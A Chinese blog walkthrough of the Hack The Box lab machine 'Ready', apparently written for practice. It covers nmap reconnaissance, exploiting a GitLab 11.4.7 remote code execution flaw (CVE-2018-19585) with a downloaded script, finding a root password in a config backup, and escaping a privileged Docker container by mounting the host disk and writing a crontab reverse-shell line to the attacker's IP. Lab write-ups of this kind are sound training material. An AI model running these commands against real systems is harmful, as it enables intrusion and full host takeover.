HTB靶机 Ready 渗透测试记录

misaka19008 发布于 2024-11-13 59 次阅读



目标信息

IP地址:10.10.10.220


信息收集

ICMP检测

PING 10.10.10.220 (10.10.10.220) 56(84) bytes of data.
64 bytes from 10.10.10.220: icmp_seq=1 ttl=63 time=309 ms
64 bytes from 10.10.10.220: icmp_seq=2 ttl=63 time=95.7 ms
64 bytes from 10.10.10.220: icmp_seq=3 ttl=63 time=261 ms
64 bytes from 10.10.10.220: icmp_seq=4 ttl=63 time=87.6 ms

--- 10.10.10.220 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3254ms
rtt min/avg/max/mdev = 87.567/188.354/308.858/98.202 ms

攻击机和靶机之间通信状态正常。

防火墙检测

# Nmap 7.94SVN scan initiated Wed Nov  6 13:47:14 2024 as: nmap -sF -p- --min-rate 4000 -oN ./fin_result.txt 10.10.10.220
Nmap scan report for 10.10.10.220
Host is up (0.092s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE         SERVICE
22/tcp   open|filtered ssh
5080/tcp open|filtered onscreen

# Nmap done at Wed Nov  6 13:47:37 2024 -- 1 IP address (1 host up) scanned in 22.52 seconds

靶机开放了2TCP端口。

网络端口扫描

TCP端口扫描结果

# Nmap 7.94SVN scan initiated Wed Nov  6 13:53:44 2024 as: nmap -sS -sV -A -p 22,5080 -oN ./tcp_report.txt 10.10.10.220
Nmap scan report for 10.10.10.220
Host is up (0.090s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Sign in xC2xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   88.27 ms 10.10.14.1
2   88.39 ms 10.10.10.220

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov  6 13:54:03 2024 -- 1 IP address (1 host up) scanned in 19.27 seconds

UDP端口开放列表扫描结果

# Nmap 7.94SVN scan initiated Wed Nov  6 14:10:04 2024 as: nmap -sU -p- --min-rate 4000 -oN ./udp_ports.txt 10.10.10.220
Warning: 10.10.10.220 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.220
Host is up (0.20s latency).
All 65535 scanned ports on 10.10.10.220 are in ignored states.
Not shown: 65344 open|filtered udp ports (no-response), 191 closed udp ports (port-unreach)

# Nmap done at Wed Nov  6 14:13:10 2024 -- 1 IP address (1 host up) scanned in 186.24 seconds

UDP端口详细信息扫描结果

(无)

同时发现靶机操作系统为Ubuntu Linux


服务探测

SSH服务(22端口)

端口Banner

┌──(root㉿misaka19008)-[/home/megumin/Documents/pentest_notes/ready]
└─# nc -nv 10.10.10.220 22
(UNKNOWN) [10.10.10.220] 22 (ssh) open
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4

Web应用程序(5080端口)

打开主页:http://ready.htb:5080/

发现靶机部署了GitLab代码托管系统,尝试注册一个账户:

成功登录GitLab。现在点击右上角头像 => Help按钮,打开GitLab帮助页面:

成功发现部署的系统为GitLab CE v11.4.7,尝试联网搜索漏洞,成功发现一个远程代码执行漏洞,编号为CVE-2018-19585


渗透测试

GitLab RCE漏洞利用

直接下载EXPgitlab-RCE-11.4.7/rce_script.py at main · Algafix/gitlab-RCE-11.4.7

wget https://raw.githubusercontent.com/Algafix/gitlab-RCE-11.4.7/refs/heads/main/rce_script.py

随后执行如下命令:

./exp.py -u misaka19008 -p Asd310056 -g http://ready.htb:5080 -l 10.10.14.2 -P 443 bash

反弹Shell成功!!!


权限提升

Docker容器内提权

进入系统之后,尝试使用LinPeas工具进行本地信息收集,发现处于Docker容器内。

基本信息

命名空间

容器配置

挂载点

特权模式信息

并未发现敏感信息,尝试进入其它目录搜集信息。在/opt目录下发现backup文件夹:

发现文件夹内有Docker容器的配置文件和GitLab的配置文件备份。docker-compose.yml内容:

version: '2.4'

services:
  web:
    image: 'gitlab/gitlab-ce:11.4.7-ce.0'
    restart: always
    hostname: 'gitlab.example.com'
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://172.19.0.2'
        redis['bind']='127.0.0.1'
        redis['port']=6379
        gitlab_rails['initial_root_password']=File.read('/root_pass')
    networks:
      gitlab:
        ipv4_address: 172.19.0.2
    ports:
      - '5080:80'
      #- '127.0.0.1:5080:80'
      #- '127.0.0.1:50443:443'
      #- '127.0.0.1:5022:22'
    volumes:
      - './srv/gitlab/config:/etc/gitlab'
      - './srv/gitlab/logs:/var/log/gitlab'
      - './srv/gitlab/data:/var/opt/gitlab'
      - './root_pass:/root_pass'
      - '/opt/user:/home/dude/'
    privileged: true
    restart: unless-stopped
    #mem_limit: 1024m

networks:
  gitlab:
    driver: bridge
    ipam:
      config:
        - subnet: 172.19.0.0/16

通过读取配置文件,发现容器的特权模式可能被开启,但因为当前不是root用户而无法利用。尝试使用/root_pass文件内的文本作为root密码使用,但失败。尝试读取剩下的两份文件,在gitlab.rb文件中找到了一个密码wW59U!ZKMbG9+*#h

尝试登录root用户:

  • 用户名:root
  • 密码:wW59U!ZKMbG9+*#h

成功!!

Docker容器逃逸

进入容器root用户之后,尝试执行LinPeas重新检查容器的情况:

发现特权模式被开启!直接将宿主机的根目录挂载至容器内,随后写入计划任务反弹Shell提权。首先执行fdisk -l命令寻找宿主机磁盘设备:

发现/dev/sda2设备的容量达9.5G,确定该设备为宿主机磁盘。直接进行挂载:

mkdir /mnt/evil_mount
mount /dev/sda2 /mnt/evil_mount

查看目录:

挂载成功!!接下来执行如下命令,向宿主机/etc/crontab文件写入计划任务配置:

echo "*/1 * * * * root /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'" > /mnt/evil_mount/etc/crontab

随后使用netcat在本地4444端口启动监听:

提权成功!!!!


Flag文件展示


本次靶机渗透到此结束


  • wechat_img
此作者没有提供个人介绍
最后更新于 2024-11-13